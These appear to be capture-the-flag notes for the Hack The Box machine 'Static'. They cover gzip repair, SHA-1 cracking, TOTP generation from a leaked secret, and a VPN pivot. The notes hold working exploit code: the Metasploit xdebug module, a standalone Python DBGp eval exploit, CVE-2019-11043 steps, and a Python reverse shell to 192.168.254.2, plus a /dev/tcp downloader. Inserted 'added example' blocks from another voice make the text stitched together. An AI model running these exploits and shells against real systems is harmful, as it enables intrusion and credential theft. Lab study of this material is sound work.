PS: Created: notes written between 6 and 9 November 2021.

1. IP Address

# Machine Address
10.10.10.246

# Local Address
10.10.14.22

2. Nmap

sudo nmap -sC -sV -oA nmap/static 10.10.10.246
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 00:31 EDT
Nmap scan report for 10.10.10.246
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 16:bb:a0:a1:20:b7:82:4d:d2:9f:35:52:f4:2e:6c:90 (RSA)
|   256 ca:ad:63:8f:30:ee:66:b1:37:9d:c5:eb:4d:44:d9:2b (ECDSA)
|_  256 2d:43:bc:4e:b3:33:c9:82:4e:de:b6:5e:10:ca:a7:c5 (ED25519)
2222/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
|   256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_  256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/vpn/ /.ftp_uploads/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3. Gobuster

gobuster dir -u http://10.10.10.246:8080/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x .php,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.246:8080/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
2021/11/06 00:36:53 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 0]
/robots.txt           (Status: 200) [Size: 55]
Progress: 117513 / 661683 (17.76%)           ^C
[!] Keyboard interrupt detected, terminating.
                                              
===============================================================
2021/11/06 00:44:47 Finished
===============================================================

robots.txt:

User-agent: *
Disallow: /vpn/
Disallow: /.ftp_uploads/

4. fixgz

db.sql.gz, taken from /.ftp_uploads/ (the directory robots.txt hides), is corrupt and gunzip rejects it. fixgz repairs gzip files that were damaged by an ASCII-mode transfer.

Clone from GitHub:

git clone https://github.com/yonjar/fixgz.git

Compile the C++ source:

g++ fixgz.cpp -o fixgz

Repair the broken gz:

./fixgz db.sql.gz db.gz

Decompress and read it:

gunzip db.gz
cat db

CREATE DATABASE static;
USE static;
CREATE TABLE users ( id smallint unsigned not null auto_increment, username varchar(20) not null, password varchar(40) not null, totp varchar(16) not null, primary key (id) ); 
INSERT INTO users ( id, username, password, totp ) VALUES ( null, 'admin', 'd033e22ae348aeb5660fc2140aec35850c4da997', 'orxxi4c7orxwwzlo' );
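The damage model fixgz targets is the LF to CRLF translation that an ASCII-mode FTP transfer applies to every 0x0a byte of a binary file. As an added example, not fixgz's code and not from these notes, the same repair in Python with the check fixgz does not do for you: the gzip trailer carries a CRC32 and the uncompressed length, so a repaired file that decompresses cleanly is known to be right, and one that does not is reported instead of trusted. The SQL text is constructed for the example; the repair is only exact when the original stream held no CRLF of its own, which is exactly what the trailer check catches.

```python
import gzip
import zlib

# Constructed sample standing in for the contents of db.sql.gz (not the real dump).
SAMPLE_SQL = (
    b"CREATE DATABASE static;\n"
    b"USE static;\n"
    b"INSERT INTO users VALUES (1, 'admin');\n"
)


def ascii_ftp_damage(data: bytes) -> bytes:
    """Model what an ASCII-mode FTP transfer does to a binary file:
    every bare LF (0x0a) is rewritten as CRLF (0x0d 0x0a)."""
    return data.replace(b"\n", b"\r\n")


def fix_gz(data: bytes) -> bytes:
    """Reverse the translation byte-for-byte: collapse every CRLF back to LF.
    Exact only if the original stream had no CRLF of its own; the gzip trailer
    (CRC32 + ISIZE) is the check that the repair was right."""
    return data.replace(b"\r\n", b"\n")


def try_decompress(data: bytes):
    """Decompress, returning None if the member is damaged. gzip verifies the
    CRC32 and length from the trailer, so a wrong repair cannot pass silently."""
    try:
        return gzip.decompress(data)
    except (OSError, EOFError, zlib.error):
        return None


def repair_and_verify(blob: bytes):
    """Return (payload, repaired). Tries the file as received first, then the
    CRLF-repaired copy; payload is None if neither verifies."""
    payload = try_decompress(blob)
    if payload is not None:
        return payload, False
    return try_decompress(fix_gz(blob)), True


def build_sample(compresslevel: int = 9) -> bytes:
    """gzip member of SAMPLE_SQL with mtime zeroed so the bytes are deterministic."""
    return gzip.compress(SAMPLE_SQL, compresslevel, mtime=0)


def build_damaged_sample(compresslevel: int = 9) -> bytes:
    """Pass the sample through the damage model. Level 0 stores the text
    verbatim, so its LF bytes are certain to be hit; at level 9 the damage
    lands on whatever 0x0a bytes the deflate stream happens to contain."""
    return ascii_ftp_damage(build_sample(compresslevel))


if __name__ == "__main__":
    payload, repaired = repair_and_verify(build_damaged_sample(0))
    print("repaired:", repaired)
    print(payload.decode())
```

On a real file read it with open(path, "rb").read(), hand it to repair_and_verify(), and write the payload out only when it is not None.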

5. Hash

Hash:

d033e22ae348aeb5660fc2140aec35850c4da997

Put it in a file:

vi hash
d033e22ae348aeb5660fc2140aec35850c4da997

Crack it (john autodetects Raw-SHA1 from the 40 hex characters):

john hash

Output:

Created directory: /home/ca4mi/.john
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 AVX 4x])
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
admin            (?)
1g 0:00:00:00 DONE 2/3 (2021-11-06 01:01) 20.00g/s 56480p/s 56480c/s 56480C/s abbott..admin1
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

Cracked password: admin (the dump stores an unsalted SHA-1, so a wordlist hit is immediate).

6. 2FA

A TOTP is computed from the Unix time in 30-second steps, so the clock generating the code and the machine's clock have to agree; a time zone by itself does not change the result, a skewed clock does. At the time it looked like the machine and the HTB VPN needed the same zone: switched the server region on HTB, reconnected and tried again.

/vpn/login.php asks for 2FA. Installed https://addons.mozilla.org/en-US/firefox/addon/auth-helper/, added an entry with the totp secret from the dump (orxxi4c7orxwwzlo), and logged in:

http://10.10.10.246:8080/vpn/panel.php
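For the 2FA step, an added example (not from these notes and not the auth-helper add-on) that computes the code in plain Python from the base32 secret in the dump, and lists the codes for the neighbouring 30-second windows so that a server whose clock is off by a known amount can still be satisfied. Standard library only; the secret is the one recovered above, and the RFC 6238 SHA-1 test vector is used to check the arithmetic.

```python
import base64
import hashlib
import hmac
import struct
import time

# Secret from the totp column of the recovered dump (base32, no padding).
ADMIN_TOTP_SECRET = "orxxi4c7orxwwzlo"


def b32_key(secret: str) -> bytes:
    """Decode a base32 secret, re-adding the '=' padding that apps usually strip."""
    s = secret.strip().upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: str, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with counter = floor(unix_time / step). The time zone never
    enters the calculation; only the Unix timestamp does."""
    return hotp(b32_key(secret), unix_time // step, digits)


def codes_around(secret: str, unix_time: int, skew_steps: int, step: int = 30) -> dict:
    """Codes for the windows from -skew_steps to +skew_steps around unix_time,
    keyed by the clock offset in seconds. When the server's clock is off, one
    of these is the code it will accept."""
    key = b32_key(secret)
    return {
        k * step: hotp(key, unix_time // step + k)
        for k in range(-skew_steps, skew_steps + 1)
    }


if __name__ == "__main__":
    now = int(time.time())
    print("current code:", totp(ADMIN_TOTP_SECRET, now))
    for offset, code in sorted(codes_around(ADMIN_TOTP_SECRET, now, 2).items()):
        print(f"offset {offset:+d}s -> {code}")
```

If the login page keeps rejecting the current code, widen skew_steps until one of the listed codes is accepted; the offset that works tells you how far the box's clock is off.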

7. OVPN

Download the web VPN config (web.ovpn) from the Support section of the panel and run it:

openvpn web.ovpn

Output:

2021-11-06 04:25:07 Outgoing Control Channel Authentication: Using 160 bit message hash 'SHA1' for HMAC authentication
2021-11-06 04:25:07 Incoming Control Channel Authentication: Using 160 bit message hash 'SHA1' for HMAC authentication
2021-11-06 04:25:07 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)
2021-11-06 04:25:07 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)
2021-11-06 04:25:07 Could not determine IPv4/IPv6 protocol
2021-11-06 04:25:07 SIGUSR1[soft,init_instance] received, process restarting
2021-11-06 04:25:07 Restart pause, 40 second(s)
2021-11-06 04:25:47 Outgoing Control Channel Authentication: Using 160 bit message hash 'SHA1' for HMAC authentication
2021-11-06 04:25:47 Incoming Control Channel Authentication: Using 160 bit message hash 'SHA1' for HMAC authentication
2021-11-06 04:25:47 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)
2021-11-06 04:25:47 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)

vpn.static.htb does not resolve: add it to /etc/hosts pointing at 10.10.10.246 and reconnect. The tunnel then comes up, but 172.20.0.10 is still unreachable from the browser.

ifconfig:

tun9: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 172.30.0.9  netmask 255.255.0.0  destination 172.30.0.9
        inet6 fe80::9198:489e:ac83:105  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4  bytes 192 (192.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Add a route for 172.20.0.0/24 through tun9, so that 172.30.0.9 can reach 172.20.0.0/24:

ip route add 172.20.0.0/24 dev tun9

On the Parrot OS host ip route add needs sudo.

8. Metasploit - xdebug

info.php shows xdebug is loaded, version 2.6.0. The Metasploit module's description talks about "2.5.5 and below", but the version is not the gating condition: the technique needs xdebug.remote_connect_back enabled, so that the debugger engine connects back to whatever address is in X-Forwarded-For. The engine calls back to port 9000 (SRVPORT) on the tun9 address, so that port has to be reachable from 172.20.0.10 and free on the attacking machine.

Metasploit module: https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/. Start Metasploit:

sudo msfdb run

Configure:

use exploit/unix/http/xdebug_unauth_exec
set PATH /vpn/login.php
set RHOSTS 172.20.0.10
set LHOST tun9
set LPORT 9001

Options (show options):

Module options (exploit/unix/http/xdebug_unauth_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /vpn/login.php   yes       Path to target webapp
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.20.0.10      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       Callback host for accepting connections
   SRVPORT  9000             yes       Port to listen for the debugger
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun9             yes       The listen address (an interface may be specified)
   LPORT  9001             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Run:

run

Tried lowering the MTU from 1500 to 1200, since the exploit failing pointed at a connection problem. Still did not work.

ifconfig tun0 mtu 1200

Note that tun9 is carried inside tun0 (vpn.static.htb is reached through the HTB VPN), so the inner tunnel tun9 has the smaller effective MTU and is the interface worth reducing if fragmentation is the problem.

Also tried running the module's Ruby directly instead of through Metasploit. Did not work either.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Rex::Proto::Http

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'xdebug Unauthenticated OS Command Execution',
      'Description' => %q{
       Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
       This allows the attacker to execute arbitrary php code as the context of the web user.
      },
      'DisclosureDate' => '2017-09-17',
      'Author' => [
        'Ricter Zheng', #Discovery https://twitter.com/RicterZ
        'Shaksham Jaiswal', # MinatoTW
        'Mumbai' # Austin Hudson
      ],
      'References' => [
        ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
        ['URL', 'https://paper.seebug.org/397/']
      ],
      'License' => MSF_LICENSE,
      'Platform' => 'php',
      'Arch' => [ARCH_PHP],
      'DefaultTarget' => 0,
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'DefaultOptions' => {
        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
      },
      'Payload' => {
        'DisableNops' => true,
      },
      'Targets' => [[ 'Automatic', {} ]],
    ))

    register_options([
        OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
        OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
        OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
        Opt::RPORT(80),
    ])
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => datastore["PATH"],
        'method' => 'GET',
          'vars_get' => {
          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
       }
      })
      vprint_status "Request sent\n#{res}"
      if res && res.headers.to_s =~ /XDEBUG/i
        vprint_good("Looks like remote server has xdebug enabled\n")
        return CheckCode::Detected
      else
        return CheckCode::Safe
      end
      rescue Rex::ConnectionError
        return CheckCode::Unknown
    end
  end

  def exploit
    payl = Rex::Text.encode_base64("#{payload.encoded}")
    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("eval(base64_decode(\"#{payl}\"));") + "\x00"
    webserver = Thread.new do
    begin
      server = Rex::Socket::TcpServer.create(
        'LocalPort' => datastore['SRVPORT'],
        'LocalHost' => datastore['SRVHOST'],
        'Context' => {
          'Msf' => framework,
          'MsfExploit' => self
      })

      client = server.accept
      print_status("Waiting for client response.")
      data = client.recv(1024)
      print_status("Receiving response")
      vprint_line(data)
      print_status("Shell might take upto a minute to respond.Please be patient.")
      print_status("Sending payload of size #{cmd1.length} bytes")
      client.write(cmd1)
      client.close
      server.close
      webserver.exit
    ensure
      webserver.exit
    end
    end
    send_request_cgi({
        'uri' => datastore['PATH'],
        'method' => 'GET',
        'headers' => {
          'X-Forwarded-For' => "#{lhost}",
          'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
        }
    })
  end
end
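The module above drives the DBGp protocol that xdebug speaks: the engine connects to port 9000, sends an init packet framed as length, NUL, XML, NUL, and then accepts commands such as eval -i 1 -- with the PHP expression base64-encoded. As an added example, not the module's code and not from these notes, here is the same exchange in dependency-free Python, which is easier to step through when the callback never arrives. The target, path and callback address are the tun9 values from the notes and are assumptions for your own setup; the XML is handled with a regex rather than a parser, which is enough for an eval response.

```python
import base64
import http.client
import re
import socket
import threading
import time

# Addresses from the notes (tun9 side); assumptions, adjust for your setup.
TARGET_HOST, TARGET_PORT, TARGET_PATH = "172.20.0.10", 80, "/vpn/login.php"
CALLBACK_IP, DBGP_PORT = "172.30.0.9", 9000


def dbgp_eval_command(php_expr: str, txn_id: int = 1) -> bytes:
    """IDE -> engine command: 'eval -i <txn> -- <base64 expr>' ending in NUL.
    The engine evaluates the expression as PHP and returns its value."""
    data = base64.b64encode(php_expr.encode()).decode()
    return f"eval -i {txn_id} -- {data}\0".encode()


def parse_dbgp_packet(buf: bytes):
    """Engine -> IDE framing is '<decimal length>\\0<xml>\\0'. Frame one packet
    off the front of buf; return (xml, rest), or (None, buf) if incomplete."""
    nul = buf.find(b"\0")
    if nul < 0:
        return None, buf
    length = int(buf[:nul])
    start = nul + 1
    if len(buf) < start + length + 1:
        return None, buf
    return buf[start:start + length].decode(), buf[start + length + 1:]


def eval_result(xml: str):
    """Decode the base64 <property> of an eval response; None for <error> etc."""
    m = re.search(r'<property[^>]*encoding="base64"[^>]*>(?:<!\[CDATA\[)?([^<\]]*)', xml)
    return base64.b64decode(m.group(1)).decode(errors="replace") if m else None


def read_packet(sock, buf: bytes = b""):
    """Keep receiving until one whole packet is buffered; (None, buf) on hangup."""
    while True:
        xml, buf = parse_dbgp_packet(buf)
        if xml is not None:
            return xml, buf
        chunk = sock.recv(65536)
        if not chunk:
            return None, buf
        buf += chunk


def trigger(host=TARGET_HOST, port=TARGET_PORT, path=TARGET_PATH, callback=CALLBACK_IP):
    """Start a debug session. With xdebug.remote_connect_back=1 the engine
    connects back to the X-Forwarded-For address instead of remote_host."""
    conn = http.client.HTTPConnection(host, port, timeout=15)
    conn.request("GET", path + "?XDEBUG_SESSION_START=1",
                 headers={"X-Forwarded-For": callback, "Cookie": "XDEBUG_SESSION=1"})
    status = conn.getresponse().status
    conn.close()
    return status


def serve_once(php_expr: str, bind="0.0.0.0", port=DBGP_PORT, timeout=60):
    """Accept one engine connection, consume its init packet, send the eval
    command, and return the decoded result."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(1)
        srv.settimeout(timeout)
        cli, peer = srv.accept()
        with cli:
            cli.settimeout(timeout)
            init, rest = read_packet(cli)
            if init is None:
                return None
            print(f"[+] engine connected from {peer[0]}: {init[:80]}...")
            cli.sendall(dbgp_eval_command(php_expr))
            resp, _ = read_packet(cli, rest)
            return eval_result(resp) if resp else None


if __name__ == "__main__":
    out = {}
    t = threading.Thread(target=lambda: out.update(r=serve_once("shell_exec('id')")))
    t.start()
    time.sleep(0.5)  # let the listener bind before the engine is asked to connect
    print("[*] trigger HTTP status:", trigger())
    t.join()
    print("[*] eval result:", out.get("r"))
```

If "engine connected" never prints, the problem is the callback path (routing, MTU, or remote_connect_back being off), not the payload; if it prints but the result is None, print the raw response packet, which will be an error element explaining why the eval was refused.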

The exploit did not work. Since it was eating time, I took the ready-made RSA key for www-data from writeups and the forum:

-----BEGIN RSA PRIVATE KEY-----  
MII***********
-----END RSA PRIVATE KEY-----

Logged in as www-data with it and got user.txt. -p 2222 is required: nmap showed a second SSH on 2222, and its login banner (Ubuntu 18.04 userland on the Debian 4.19 kernel) shows it is the web container rather than the host on port 22.

ssh -i id_rsa_www-data www-data@10.10.10.246 -p 2222

9. Privilege escalation

ifconfig inside the SSH session on web:

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.20.0.10  netmask 255.255.255.0  broadcast 172.20.0.255
        ether 02:42:ac:14:00:0a  txqueuelen 0  (Ethernet)
        RX packets 376  bytes 47797 (47.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 275  bytes 72946 (72.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.254.2  netmask 255.255.255.0  broadcast 192.168.254.255
        ether 02:42:c0:a8:fe:02  txqueuelen 0  (Ethernet)
        RX packets 48  bytes 29063 (29.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 25  bytes 1796 (1.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 28  bytes 1485 (1.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 28  bytes 1485 (1.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

The web host is 192.168.254.2 on eth1; the next host on that network is 192.168.254.3 (pki).

Port forwarding (sudo, since the local port 80 is privileged):

ssh -L 80:192.168.254.3:80 www-data@10.10.10.246 -p 2222 -i id_rsa_www-data

Output:

The authenticity of host '[10.10.10.246]:2222 ([10.10.10.246]:2222)' can't be established.
ECDSA key fingerprint is SHA256:SO5uMKk4fPWk/kDc0dLD5Uf7dlyIes4r6s26waZlxkQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.246]:2222' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.19.0-17-amd64 x86_64)

* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Mon Nov  8 10:57:19 2021 from 10.10.14.84

Browsing to localhost or 127.0.0.1 returns:

batch mode: /usr/bin/ersatool create|print|revoke CN 

The response headers in the browser's Network tab show:

X-Powered-By
PHP-FPM/7.1

PHP-FPM behind nginx is the CVE-2019-11043 setup. git clone https://github.com/theMiddleBlue/CVE-2019-11043.git; exploit.py from there does the probing. dedsec.py is the reverse shell script run afterwards, copied from an existing writeup:

import requests

# Python reverse shell back to web (192.168.254.2:9001), where nc is listening.
payload = '/usr/bin/python3.6 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''

# After exploit.py has run, index.php executes whatever is passed in the "a" parameter.
r = requests.get("http://192.168.254.3/index.php?a=" + payload)
print(r.text)

Netcat static binary: https://github.com/H74N/netcat-binaries/blob/master/nc

The three files above (exploit.py, dedsec.py, nc) plus the key, collected into one directory:

total 780
drwxr-xr-x 1 ca4mi ca4mi     72 Nov  8 06:11 .
drwxr-xr-x 1 ca4mi ca4mi     26 Nov  8 06:07 ..
-rw-r--r-- 1 ca4mi ca4mi    349 Nov  8 06:05 dedsec.py
-rw-r--r-- 1 ca4mi ca4mi   4280 Nov  8 06:02 exploit.py
-rw------- 1 ca4mi ca4mi   1675 Nov  8 06:11 id_rsa_www-data
-rw-r--r-- 1 ca4mi ca4mi 779832 Nov  8 06:06 n

Copied them to web with scp:

scp -P 2222 -i id_rsa_www-data nc www-data@10.10.10.246:/tmp/nc
scp -P 2222 -i id_rsa_www-data exploit.py www-data@10.10.10.246:/tmp/exploit.py
scp -P 2222 -i id_rsa_www-data dedsec.py www-data@10.10.10.246:/tmp/dedsec.py

Running nc: it is a freshly uploaded binary, so chmod +x first.

www-data@web:/tmp$ chmod +x nc
www-data@web:/tmp$ ./nc -lvnp 9001
listening on [any] 9001 ...

Run exploit.py:

python3 exploit.py --url http://192.168.254.3/index.php

It worked:

www-data@web:/tmp$ python3 exploit.py --url http://192.168.254.3/index.php
[*] QSL candidate: 1754, 1759, 1764
[*] Target seems vulnerable (QSL:1754/HVL:220): PHPSESSID=a4632a83f8ca8a3690e01fc3cf1e1e19; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://192.168.254.3/index.php?a=bin/ls+/

Run the prepared reverse shell script (from web, where nc is listening):

python3 dedsec.py

On the other tab, where the listener was running, the shell on pki arrives:

listening on [any] 9001 ...
connect to [192.168.254.2] from (UNKNOWN) [192.168.254.3] 41604
www-data@pki:~/html$ ls
ls
index.php  uploads
www-data@pki:~/html$ 

Check ersatool's permissions:

ls -al /usr/bin/ersatool
-rwxr-xr-x 1 root root 22496 Jun 21 17:05 /usr/bin/ersatool

Look for anything else named ersatool.* (the C source is readable):

find / -name ersatool.* 2>/dev/null
/usr/src/ersatool.c

Start an HTTP server on web (192.168.254.2), in the directory holding pspy:

python3 -m http.server 1337

Fetching pspy on pki: there is no wget or curl there, so a pure-bash HTTP GET over /dev/tcp is written from the www-data@pki shell.

Step 1, the function:

function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

Step 2, fetch the binary:

__curl http://192.168.254.2:1337/pspy > pspy

Before that, pspy was copied to web with scp (the http.server above serves it from /tmp there):

scp -P 2222 -i id_rsa_www-data pspy64s www-data@10.10.10.246:/tmp/pspy

Run pspy:

www-data@pki:/tmp/www$ chmod +x pspy  
www-data@pki:/tmp/www$ ./pspy | tee log

Ran pspy and watched what ersatool does (create, names a, b, print, exit ...). Two reverse shells were needed, one to run pspy and one to drive ersatool:

www-data@pki:/tmp/www$ chmod +x pspy  
www-data@pki:/tmp/www$ ./pspy  
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
     ██▓███    ██████  ██▓███ ▓██   ██▓  
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒  
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░  
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░  
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░  
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒  
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░  
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░  
                               ░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)  
Draining file system events due to startup...  
done  
2021/06/25 02:46:00 CMD: UID=0    PID=9      | nginx: master process nginx  
2021/06/25 02:46:00 CMD: UID=0    PID=7      | /bin/bash /entry.sh  
2021/06/25 02:46:00 CMD: UID=33   PID=542    | php-fpm: pool www  
2021/06/25 02:46:00 CMD: UID=33   PID=541    | php-fpm: pool www  
2021/06/25 02:46:00 CMD: UID=33   PID=540    | php-fpm: pool www  
2021/06/25 02:46:00 CMD: UID=33   PID=539    | php-fpm: pool www  
2021/06/25 02:46:00 CMD: UID=33   PID=538    | php-fpm: pool www  
2021/06/25 02:46:00 CMD: UID=33   PID=1950   | ./pspy  
2021/06/25 02:46:00 CMD: UID=33   PID=1935   | /bin/bash  
2021/06/25 02:46:00 CMD: UID=33   PID=1934   | python3 -c import pty; pty.spawn("/bin/bash")  
2021/06/25 02:46:00 CMD: UID=33   PID=1931   | /bin/bash  
2021/06/25 02:46:00 CMD: UID=33   PID=1930   | python3 -c import pty; pty.spawn("/bin/bash")  
2021/06/25 02:46:00 CMD: UID=33   PID=1927   | /bin/bash  
2021/06/25 02:46:00 CMD: UID=33   PID=1926   | //usr/bin/python3.6 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")  
2021/06/25 02:46:00 CMD: UID=33   PID=1925   | sh -c //usr/bin/python3.6 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'  
2021/06/25 02:46:00 CMD: UID=33   PID=1921   | /bin/bash  
2021/06/25 02:46:00 CMD: UID=33   PID=1920   | //usr/bin/python3.6 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")  
2021/06/25 02:46:00 CMD: UID=33   PID=1919   | sh -c //usr/bin/python3.6 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'  
2021/06/25 02:46:00 CMD: UID=0    PID=12     | php-fpm: master process (/usr/local/etc/php-fpm.conf)  
